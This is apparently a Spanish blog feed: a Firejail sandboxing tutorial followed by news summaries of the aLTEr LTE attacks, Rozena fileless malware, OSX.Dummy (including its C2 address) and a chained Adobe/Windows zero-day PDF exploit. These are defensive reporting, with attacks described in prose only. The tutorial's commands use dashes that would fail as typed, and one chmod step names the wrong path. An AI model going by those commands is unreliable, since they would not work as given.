Firejail es una herramienta fácil de usar, que nos permite realizar una especie de jaula con aplicaciones, especialmente útil para navegadores, clientes de correo electrónico, etc.

Instalación

$ sudo pacman -Syu firejail

Para que el funcionamiento de la herramienta sea óptimo debemos utilizar un kernel con el user-namespaces habilitado. En el caso de Arch, se recomienda utilizar en conjunción con el kernel linux-grsec, que lleva los parches grsecurity y habilitada esta opción o el kernel linux-usernd (disponible en el AUR).


Además, podemos añadir los siguientes paquetes (del AUR), con utilidades y perfiles predefinidos:

$ yaourt -S firetools firejail-profiles firejail-extras firectl

Existen diferentes formas de lanzar firejail:

Linea de comandos

$ firejail nombre_aplicación

Desde los menus

En este caso hay que modificar el .desktop asociado. Por orden de preferencia, sería:
   ~/.local/share/applications/aplicacion.desktop

     /usr/local/share/applications/aplicacion.desktop

    /usr/share/applications/aplicacion.desktop

Añadiremos en el fichero deseado firejail en la cláusala "Exec".

Si solo queremos que lo use el usuario actual, editaríamos/crearíamos el primero.

Si lo queremos por defecto para todos los usuarios, el segundo.
El tercero corresponde al paquete, por lo que se sobreescribe en cada actualización y, en todo caso, lo usaremos como plantilla para crear los .desktop de la primera y segunda opción.

Si se tratase de una aplicación que queremos que se ejecute en el inicio, el .desktop quedará ubicado en:

~/.config/autostart/

Entre las opciones disponibles para ejecutar firejail, disponemos de dos interesantes:

firejail –seccomp aplicación

Con la opción seccomp añadimos seguridad adicional.

firejail –seccomp –private aplicación

Con la opción private, no monta dentro del contenedor ningún directorio del usuario, muy útil para, por ejemplo, navegar por sitios "peligrosos" sin correr riesgos. Una vez se cierra la aplicación, no quedan "rastros" en el disco.

Según la aplicación a ejecutar, se usará un perfil predefinido que indica qué se debe añadir al contenedor para que funcione correctamente. En el caso de no existir un perfil para la misma, se utiliza uno genérico. Es por ello que hemos instalado los paquetes firejail-profiles y firejail-extras.

Veamos un ejemplo con firefox:

Si queremos ejecutarlo desde la línea de comandos, usaremos:

$ firejail firefox

Se lanzará con su perfil (todos los perfiles disponibles los tenemos en /etc/firejail/).

Bien, si queremos que no haya ningún cambio en disco, es decir, que sea totalmente transparente su ejecución, usaremos:

$ firejail –seccomp –private firefox

Sin embargo, esto es engorroso, si queremos utilizar por defecto firejail. Pare ello disponemos de varias opciones:

– Crear un enlace simbólico: 

ln -s /usr/bin/firejail /usr/local/bin/firefox

De esta forma, cada vez que lancemos firefox, lo hará con firejail. Esto funciona siempre que no se utilicen rutas absolutas y el path /usr/local/bin tenga preferencia o esté en la variable PATH (por defecto, para los usuarios es así).

Una herramienta que nos facilita la creación de estos enlaces es firecfg.

Sin embargo, es posible que queramos ejecutar con la opción –seccomp. Bien, para ello, podemos crear un pequeño scritp en bash. Siguiendo el ejemplo, creamos el fichero /usr/local/bin/firefox, con el siguiente contenido.

firejail –seccomp /usr/bin/firefox $@

y le damos permisos de ejecución:

sudo chmod +x /usr/bin/firefox

De esta manera, podemos añadir las opciones personalizas que deseemos.

– Modificar los .desktop:

Si lanzamos la aplicación desde el menú del escritorio en el que nos encontremos, probablemente, no se ejecutará enjaulado. El motivo es que porque se suele utilizar la ruta completa, con lo que el paso anterior es ignorado. Parar evitar problemas, eliminamos los enlaces simbólicos anteriores antes de utilizar este médoto. Siguiendo el ejemplo anterior, vamos a hacer lo siguiente:

sudo mkdir -p /usr/local/share/applications/

sudo cp /usr/share/applications/firefox.desktop /usr/local/share/applications/

Si solo lo queremos disponible para nuestro usuario:

cp /usr/share/applications/firefox.desktop ~/share/applications/

Ahora editamos el fichero y buscamos todas las ocurrencias de "Exec", cambiando el contenido por:

Exec=firejail –seccomp firefox %u

Con esto estaría todo lo necesario para aplicaciones, pero... ¿y para daemons? Bueno, dado que estamos utilizando systemd, deberemos modificar la unidad correspondiente. Para evitar que sea sobreescrita, realizarmos lo siguiente:

sudo mkdir /usr/lib/systemd/system/unidad_a_sobreescribir.service.d

Y crearemos un fichero dentro de ese directorio, con la configuración nueva, con la extensión conf (por ejemplo firejail.conf):

[Service]

ExecStart=

ExecStart=firejail –seccomp binario

Sustituyendo "binario" por el contenido del ExecStart original, disponible en /usr/lib/systemd/system/unidad_a_sobreescribir.service.

Es importante la opción "ExecStart=" ya que, de no ponerla, se ejecutarán la original y la sobreescrita.

De esta forma, aunque reinstalemos el paquete afectado, esta configuración no se perderá.

Hecho esto, debemos recargar la lista de daemons:

sudo systemctl daemon-reload

Y ya podemos lanzar el servicio en cuestión.

Ahora ya sabemos cómo lanzar las aplicaciones con firejail. Toca ver cómo monitorizarlas. Es por ello que instalamos firetools.

Si lanzamos firetools, veremos que se nos abre una especie de dock, con varios iconos. Son lanzadores de aplicaciones con perfil de firejail, detectadas en nuestro sistema. Por supuesto, estos lanzadores podemos editarlos y añadir opciones personalizadas.

En cualquier caso, la utilidad real se encuentra pulsando sobre "Firetools". Se nos abrirá una ventana donde podemos ver una lista de aplicacicones enjauladas, su árbol de procesos, podremos navegar por su sistema de ficheros, etc. Sin duda, una utilidad bastante interesante si vamos a usar esta herramienta de sandboxing.





Más información: https://firejail.wordpress.com/documentation-2/firefox-guide/

Saludos.

Análisis de seguridad de la capa dos:

Nuestro análisis de seguridad del estándar de comunicación móvil LTE (Long-Term Evolution, también conocido como 4G) en la capa de enlace de datos (denominada capa dos) ha descubierto tres nuevos vectores de ataque que permiten diferentes ataques contra el protocolo. Por un lado, presentamos dos ataques pasivos que demuestran un ataque de mapeo de identidad y un método para realizar huellas dactilares en el sitio web. Por otro lado, presentamos un ataque criptográfico activo llamado ataque LTEr que permite a un atacante redirigir las conexiones de red realizando la suplantación DNS debido a una falla de especificación en el estándar LTE. A continuación, proporcionamos una descripción general de la huella dactilar del sitio web y el ataque aLTE, y explicamos cómo los realizamos en nuestra configuración de laboratorio. Nuestro trabajo aparecerá en el Simposio IEEE 2019 sobre Seguridad y Privacidad y todos los detalles están disponibles en una versión previa a la impresión del documento.

https://alter-attack.net/#paper

Consecuencias
¿Qué tan prácticos son los ataques? Realizamos los ataques en una configuración experimental en nuestro laboratorio que depende de un hardware especial y un entorno controlado. Estos requisitos son, por el momento, difíciles de cumplir en redes LTE reales. Sin embargo, con un poco de esfuerzo de ingeniería, nuestros ataques también pueden realizarse en la naturaleza.
¿Que puede pasar? Presentamos tres ataques individuales: para mapear identidades de usuario en la celda de radio (ver el artículo para más detalles), para saber a qué sitios web accedió un usuario y para realizar un ataque de alteración (por ejemplo, en tráfico DNS) que se puede usar para redireccionar y secuestro de conexiones de red.
¿Me puede pasar esto a mí? En teoría sí, pero espera que el esfuerzo sea alto. Las víctimas más probables de tales ataques dirigidos en la práctica son personas de especial interés (por ejemplo, políticos, periodistas, etc.).
¿Quién sabe sobre los ataques? Informamos a instituciones relevantes tales como la Asociación GSM (GSMA), el Proyecto de Asociación de Tercera Generación (3GPP) y las compañías telefónicas en un proceso de revelación responsable antes de publicar este trabajo.

Más información: https://alter-attack.net/

Saludos.

El malware sin archivos aprovecha exploits para ejecutar comandos maliciosos o ejecutar scripts directamente desde la memoria utilizando herramientas legítimas del sistema como Windows Powershell. Code Red y SQL Slammer fueron los pioneros del malware sin archivos que datan de principios de la década de 2000. Actualmente, este tipo de malware está aumentando una vez más.



La charla de la ciudad durante la primera mitad del año en la comunidad de Seguridad Cibernética es el término ataque "sin archivos". Es una técnica de ataque que no requiere descargar ni arrojar archivos maliciosos al sistema para ejecutar su comportamiento malicioso, sino que aprovecha los exploits para ejecutar comandos maliciosos o ejecutar scripts directamente desde la memoria a través de herramientas legítimas del sistema. De hecho, ataques como los gusanos Code Red y SQL Slammer a principios de la década de 2000 no se guardan en ningún disco sino que almacenan su código malicioso únicamente en la memoria.

Sin embargo, el término "sin archivos" también puede ser un nombre inapropiado ya que existen ataques que pueden implicar la presencia de archivos en la computadora, como la apertura de archivos adjuntos de correos electrónicos no deseados. Una vez ejecutado, aún puede guardar un archivo en el disco y luego usar técnicas sin archivos para reunir información en el sistema y propagar la infección a través de la red. Estas técnicas pueden ser en forma de exploits e inyecciones de código para ejecutar código malicioso directamente en la memoria, almacenar scripts en el registro y ejecutar comandos a través de herramientas legítimas. Solo en 2017, el 13% del malware recopilado utiliza PowerShell para comprometer el sistema.
Las herramientas legítimas del sistema como PowerShell e Instrumental de administración de Windows están siendo objeto de abuso por actividades maliciosas, ya que estas son todas las herramientas integradas que se ejecutan en el sistema operativo Windows. Una familia de malware conocida que usa PowerShell para descargar y ejecutar archivos maliciosos es el descargador de Emotet.
Incluso hay malwares antiguos que cambiaron su técnica y ahora usan ataques sin archivos. Estos malwares pretenden ser más efectivos en términos de infectar máquinas y evitar la detección como Rozena.
Rozena es un programa malicioso de puerta trasera capaz de abrir una conexión de shell remota que conduce al autor del malware. Una conexión exitosa con el autor del malware genera numerosas preocupaciones de seguridad no solo para la máquina afectada, sino también para otras computadoras conectadas en su red.
Esto se vio por primera vez en 2015 y reapareció en marzo de 2018. El viejo y nuevo malware Rozena todavía se dirige a los sistemas operativos Microsoft Windows, pero lo que marcó la diferencia es la nueva adaptación a la técnica sin archivos que utiliza scripts de PowerShell para ejecutar su intención maliciosa. . Una encuesta realizada por Barkly y el Ponemon Institute, que encuestó a 665 líderes de TI y seguridad, descubrió que los ataques sin archivos tienen una probabilidad 10 veces mayor de tener éxito que los ataques basados ​​en archivos. Esta podría ser la razón probable por la que los autores de malware siguen el camino sin archivos.

Más información: https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena

El malware denominado OSX.Dummy utiliza un método de infección poco sofisticado, pero los usuarios que son atacados con éxito abren sus sistemas hasta la ejecución de código remota. Este malware tiene como objetivo ususarios que utilizan criptomonedas y que, además, utilizan plataformas como Slack y Discord. El investigador y experto en ciberseguridad Patrick Wardle comentó que el malware tiene privilegios de root, por lo que cuando éste conecta con el C2, se tiene un entorno privilegiado.

También comentó Wardle que se han visto varios ataques de malware en macOS que se originan en grupos de chats de Slack o Discord. Los atacantes seducen a los usuarios para que ejecuten un script que a su vez descarga el malware de 34 MB OSX.Dummy a través de cURL. La descarga se guarda en el directorio de macOS /tmp/script y luego se ejecuta. El archivo es un gran binario de 34 MB, el cual tiene 0 de 60 en VirusTotal. El script solía engañar a las víctimas para descargar el OSX.Dummy. El binario no está firmado, indica Wardle, agregando que el malware puede eludir Gatekeeper. Es curioso que este binario sería bloqueado por Gatekeeper, pero al ser un binario descargado y ejecutado desde la terminal de comandos, Gatekeeper no entra en juego, por lo que se permite ejecutar el software sin firmar.



A medida que se ejecuta el código binario, se hace uso de sudo, por lo que se necesita que el usuario introduzca sus credenciales en el terminal. A partir de ahí, el malware arroja código en varios directorios macOS, incluido /Library/LaunchDaemons/com.startup.plist, lo cual le proporciona a OSX.Dummy la persistencia. El script bash intenta conectarse a una dirección IP, la cual es 185.243.115.230 al puerto 1337. Wardle señala que si el ataque tiene éxito y el malware puede conectarse al C2, el atacante puede tomar el control del sistema objetivo.

Más información: https://threatpost.com/macos-malware-targets-crypto-community-on-slack-discord/133254/

Saludos.

Se encontraron dos exploits de día cero después de que alguien subió PoC "desarmado" a VirusTotal.



Investigadores de seguridad de Microsoft revelaron detalles de dos vulnerabilidades críticas e importantes de día cero que se descubrieron recientemente después de que alguien cargó un archivo PDF malicioso en VirusTotal y se parcheó antes de ser utilizado.

A fines de marzo, los investigadores de ESET encontraron un archivo PDF malicioso en VirusTotal, que compartieron con el equipo de seguridad de Microsoft "como un exploit potencial para una vulnerabilidad desconocida del kernel de Windows".
Después de analizar el archivo PDF malicioso, el equipo de Microsoft descubrió que el mismo archivo incluye dos exploits diferentes de día cero: uno para Adobe Acrobat y Reader y el otro para Microsoft Windows.

Dado que los parches para ambas vulnerabilidades se lanzaron en la segunda semana de mayo, Microsoft dio a conocer los detalles de ambas vulnerabilidades en la actualidad, después de dar a los usuarios el tiempo suficiente para actualizar sus sistemas operativos vulnerables y el software de Adobe.
Según los investigadores, el PDF malicioso que incluía tanto el exploit de días cero estaba en la etapa de desarrollo inicial, "dado el hecho de que el PDF en sí no entregó una carga maliciosa y parecía ser un código de prueba de concepto (PoC). "
Parece que alguien que podría haber combinado ambos días cero para construir un arma cibernética extremadamente poderosa había perdido involuntaria y erróneamente el juego al cargar su vulnerabilidad de subdesarrollo a VirusTotal.
Las vulnerabilidades de día cero en cuestión son un error de ejecución remota de código en Adobe Acrobat y Reader (CVE-2018-4990) y un error de escalamiento de privilegios en Microsoft Windows (CVE-2018-8120).
"El primer exploit ataca el motor javascript de Adobe para ejecutar Shellcode en el contexto de ese módulo", dice Matt Oh, ingeniero de seguridad de Windows Defender ATP Research.

"El segundo exploit, que no afecta a las plataformas modernas como Windows 10, permite que el shellcode escape del entorno limitado de Adobe Reader y se ejecute con privilegios elevados desde la memoria del kernel de Windows".
El exploit de Adobe Acrobat y Reader se incorporó en un documento PDF como una imagen JPEG 2000 creada con fines malintencionados que contiene el código de explotación de javascript, que desencadena una vulnerabilidad de doble libre en el software para ejecutar Shellcode.
Aprovechando la ejecución del shellcode desde la primera vulnerabilidad, el atacante usa el segundo exploit del kernel de Windows para romper el sandbox de Adobe Reader y ejecutarlo con privilegios elevados.
Debido a que esta muestra maliciosa de PDF estaba en desarrollo en el momento de la detección, al parecer incluía una carga útil simple de PoC que arrojaba un archivo vbs vacío en la carpeta de Inicio.
"Inicialmente, los investigadores de ESET descubrieron la muestra en PDF cuando se cargó en un repositorio público de muestras maliciosas", concluyeron los investigadores de ESET.

"La muestra no contiene una carga útil final, lo que puede sugerir que fue capturada durante sus primeras etapas de desarrollo. Aunque la muestra no contiene una carga útil final real maliciosa, el autor demostró un alto nivel de habilidades en el descubrimiento de vulnerabilidades y explotar la escritura ".
Desde entonces, Microsoft y Adobe lanzaron las actualizaciones de seguridad correspondientes para ambas vulnerabilidades en mayo. Para obtener más detalles técnicos de los exploits, puede dirigirse a los blogs de Microsoft y ESET.

Fuente: https://thehackernews.com/2018/07/windows-adobe-zero-exploit.html

Saludos.

Si su operador de telefonía móvil ofrece LTE, también conocida como la red 4G, debe tener cuidado ya que su comunicación de red puede ser secuestrada de forma remota.
Un equipo de investigadores ha descubierto algunas debilidades críticas en el ubicuo estándar de dispositivo móvil LTE que podría permitir a piratas informáticos sofisticados espiar las redes celulares de los usuarios, modificar el contenido de sus comunicaciones e incluso puede redirigirlas a sitios web maliciosos o de phishing.
LTE, o Long Term Evolution, es el último estándar de telefonía móvil utilizado por miles de millones de personas diseñado para brindar muchas mejoras de seguridad sobre el estándar predecesor conocido como Sistema Global para comunicaciones móviles (GSM).
Sin embargo, se han descubierto múltiples fallas de seguridad en los últimos años, que permiten a los atacantes interceptar las comunicaciones del usuario, espiar las llamadas telefónicas de los usuarios y enviar mensajes de texto, enviar falsas alertas de emergencia, falsificar la ubicación del dispositivo y desconectar completamente los dispositivos.



Más información:
https://thehackernews.com/2018/06/4g-lte-network-hacking.html?m=1

Saludos.